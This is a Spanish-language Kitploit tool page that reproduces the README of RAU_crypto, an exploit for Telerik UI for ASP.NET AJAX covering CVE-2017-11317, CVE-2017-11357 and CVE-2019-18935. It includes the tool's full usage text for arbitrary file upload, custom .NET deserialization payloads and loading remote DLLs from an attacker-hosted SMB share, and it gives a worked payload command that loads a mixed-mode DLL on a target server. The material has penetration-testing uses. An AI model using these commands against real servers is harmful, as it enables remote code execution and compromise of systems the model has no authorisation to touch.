Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
RAU_crypto — Telerik UI for ASP.NET AJAX Carga de archivos y exploit de deserialización de .NET (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935) | Kitploit
Herramientas/GitHubGitHub/bao7uo/rau_crypto
Herramientas de Cifrado/DescifradoGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubbao7uo/rau_crypto

RAU_crypto

Telerik UI for ASP.NET AJAX Carga de archivos y exploit de deserialización de .NET (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935)

Ver Repositorio
18050hace 5 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

RAU_crypto

Language

Exploit combinado para Telerik UI for ASP.NET AJAX.

  • Subida de archivos para CVE-2017-11317 y CVE-2017-11357 - subirá el archivo automáticamente
  • Deserialización .NET para CVE-2019-18935

Ahora admite la comprobación de la capacidad del objetivo para obtener payloads remotos desde un servicio SMB alojado por un atacante. Use Burp Collaborator y/o Responder para facilitar la comprobación de si los requisitos previos necesarios están en su lugar.

Para que la explotación funcione, generalmente necesita una versión con claves codificadas, o necesita conocer la clave, por ejemplo si puede divulgar el contenido de web.config. El exploit también permite el descifrado y cifrado sencillo de rauPostData utilizado con Telerik.Web.UI.WebResource.axd?type=rau

Requisitos

  • python >= 3.6 con pycryptodome (https://www.pycryptodome.org/en/latest/src/installation.html) - instalado con pip3 install pycryptodome o pip3 install pycryptodomex

Publicado en exploit-db (versión antigua)

  • https://www.exploit-db.com/exploits/43874/

Ver también

Mi otro exploit de Telerik UI (para CVE-2017-9248) probablemente también sea de interés. Está disponible aquí:

  • https://github.com/bao7uo/dp_crypto

Por hacer

  • Funcionalidad HMAC faltante para versiones posteriores.
  • Capacidad de especificar clave personalizada.
  • Argumento de línea de comandos para la ejecución de un dll de modo mixto (mientras tanto, use el payload de deserialización .NET de ejemplo proporcionado abajo).
  • Argumentos de línea de comandos para probar la capacidad de y cargar dlls de modo mixto alojados remotamente (SMB)
  • Utilidad separada para probar dll de modo mixto.
  • Proporcionar código fuente/instrucciones de compilación para dll de modo mixto.
  • Versiones de fuerza bruta.

Nota - los últimos cuatro elementos están completos pero no liberados.

Vulnerabilidades

La vulnerabilidad de subida de archivos (CVE-2017-11317) fue descubierta por otros, creo que los créditos corresponden a @straight_blast @pwntester @olekmirosh. Poco después de que se anunciara, me encontré con la librería Telerik durante el curso de mi trabajo, así que la investigué junto con la vulnerabilidad y escribí este exploit en julio de 2017. También reporté CVE-2017-11357 por la referencia insegura directa a objetos relacionada.

https://www.telerik.com/support/kb/aspnet-ajax/upload-%28async%29/details/insecure-direct-object-reference

La vulnerabilidad de deserialización .NET (CVE-2019-18935) fue descubierta por @mwulftange.

https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization

Uso

root@kitploit:~
$ ./RAU_crypto.py -h

RAU_crypto by Paul Taylor / @bao7uo 
CVE-2017-11317, CVE-2019-18935 - Telerik RadAsyncUpload hardcoded keys / arbitrary file upload / .NET deserialisation

Usage:

Decrypt a ciphertext:               -d ciphertext
Decrypt rauPostData:                -D rauPostData
Encrypt a plaintext:                -e plaintext

Generate file upload rauPostData:   -E c:\\destination\\folder Version
Generate all file upload POST data: -p c:\\destination\\folder Version ../local/filename
Upload file:                        -P c:\\destination\\folder Version c:\\local\\filename url [proxy]

Generate custom payload POST data : -c partA partB
Send custom payload:                -C partA partB url [proxy]

Check remote SMB payload capability -r lhost url [proxy]

Load remote SMB dll payload         -R lhost/share/mixed_mode_assembly.dll url [proxy]\n\n" +
Trigger local uploaded dll payload  -L c:/users/public/documents/mixed_mode_assembly.dll url [proxy]\n\n" +

Example URL:               http://target/Telerik.Web.UI.WebResource.axd?type=rau
Example Version:           2016.2.504
Example optional proxy:    127.0.0.1:8080

N.B. Advanced settings e.g. custom keys or PBKDB algorithm can be found by searching source code for: ADVANCED_SETTINGS

$

Ejemplo - descifrado

Decrypt screenshot

Ejemplo - subida de archivos arbitraria

Upload screenshot

Payload personalizado (deserialización .NET)

Para obtener detalles sobre payloads personalizados para deserialización .NET, hay un excelente artículo de @mwulftange quien descubrió esta vulnerabilidad en el blog de Code White en el siguiente enlace.

  • https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html

Actualización - Hay un exploit alternativo de Caleb Gross @noperator, que incorpora características de este exploit, con un excelente artículo de blog explicándolo todo. Gracias también a Caleb por contribuir a RAU_Crypto.

  • https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui

Otros enlaces relevantes.

  • https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
  • https://threatvector.cylance.com/en_us/home/implications-of-loading-net-assemblies.html
  • https://thewover.github.io/Mixed-Assemblies/

Ejemplo de payload de deserialización .NET:

root@kitploit:~
$ ./RAU_crypto.py -C '{"Path":"file:///c:/users/public/documents/mixedmode64.dll"}' 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' http://target/Telerik.Web.UI.WebResource.axd?type=rau

Para DLL de modo mixto, consulte mi otro repositorio de github:

  • https://github.com/bao7uo/MixedUp

Agradecimientos especiales a @irsdl quien inspiró la función de payload personalizado.

Crédito a @rwincey quien inspiró la función de dll remoto.

Descargar herramienta